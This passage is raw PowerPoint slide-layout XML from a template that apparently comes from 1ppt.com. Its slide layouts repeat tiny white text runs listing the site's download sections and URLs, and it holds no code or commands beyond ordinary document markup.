              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout158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58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58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58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5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59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59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59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59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59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59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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout159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59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59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59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6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60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60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60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60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60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60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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout160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60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60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60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6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61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61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61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61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61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61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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
